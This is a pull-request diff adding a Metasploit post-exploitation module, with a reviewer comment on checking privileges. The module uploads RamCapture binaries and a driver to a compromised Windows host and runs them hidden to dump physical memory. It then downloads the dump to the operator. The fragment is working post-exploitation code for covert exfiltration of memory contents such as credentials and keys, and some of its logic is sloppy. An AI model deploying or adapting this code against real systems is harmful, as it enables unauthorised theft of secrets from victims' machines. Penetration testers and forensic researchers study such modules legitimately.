modules/post/windows/gather/forensics/memorydump.rb

```diff
@@ -0,0 +1,230 @@
+    
+
+    new_file = Rex::Text::rand_text_alpha(5 + rand(3)) + ".vmem"
+    tmp = Dir::tmpdir + "/" + new_file
+    mem_dump = @win_env_vars['temp'] + new_file
+
+    cmd = ""
+    prog2check = ""
+
+    print_warning("Sending file, this may take some time...")
+    files = Array[]
+
+    if @win_env_vars['arch'] == "x64"
+
+        files.push('msvcp110.dll')
+        files.push('msvcr110.dll')
+        files.push('RamCapture64.exe')
+        files.push('ramcapturedriver.cat')
+        files.push('RamCaptureDriver64.sys')
+
+        prog2check = 'RamCapture64.exe'
+        mem_dump = @win_env_vars['temp'] + new_file
+
+        ramcapture_path = datastore['RAMCAPTURE_PATH']
+
+        files.each do |f|
+            file = File.join(ramcapture_path, 'x64/' + f)
+
+            if !File.exist?(file) or !File.file?(file)
+                print_error("File not found: #{file}")
+                return
+            end
+
+        end
+
+
+        files.each do |f|
+            file = File.join(ramcapture_path, 'x64/' + f)
+
+            print_status("Uploading file #{@win_env_vars['temp']}#{f}")
+            session.fs.file.upload_file(@win_env_vars['temp'] + f, file)  
+
+        end
+
+
+    else
+
+
+        files.push('msvcp110.dll')
+        files.push('msvcr110.dll')
+        files.push('RamCapture.exe')
+        files.push('RamCaptureDriver.sys')
+
+        prog2check = 'RamCapture.exe'
+
+        ramcapture_path = datastore['RAMCAPTURE_PATH']
+
+        files.each do |f|
+            file = File.join(ramcapture_path, 'x86/' + f)
+
+            if !File.exist?(file) or !File.file?(file)
+                print_error("File not found: #{file}")
+                return
+            end
+
+        end
+
+
+        files.each do |f|
+            file = File.join(ramcapture_path, 'x86/' + f)
+
+            print_status("Uploading file #{@win_env_vars['temp']}#{f}")
+            session.fs.file.upload_file(@win_env_vars['temp'] + f, file)  
+
+        end
+
+
+    end
+
+    print_status("Running #{prog2check}")
+    print_warning("This may take some time...")
+    r = session.sys.process.execute( @win_env_vars['temp'] + prog2check, mem_dump,{'Hidden' => true})
+    sleep(2)
+
+    #check if is running
+    found = 0
+    while found == 0
+            session.sys.process.get_processes().each do |x|
+                    found =1
+                    if prog2check.downcase == (x['name'].downcase)
+                            sleep(0.5)
+                            found = 0
+                    end
+            end
+    end
+    r.close
+
+    if !session.fs.file.exist?(mem_dump)
+        print_error("Remote memory dump file #{mem_dump} not found!")
+        return false
+    else
+        print_error("Remote memory dump file saved at #{mem_dump}")  
+    end
+
+    
+    print_status("Downloading memory dump to #{tmp}")
+    session.fs.file.download_file(tmp, mem_dump)
+
+    print_status("Downloading fineshed")
+
+
+    true
+  end
+
+  def got_root
```

Comment:
Use `is_system?` and ` is_admin?` to check if obtain the system and administrator privilege.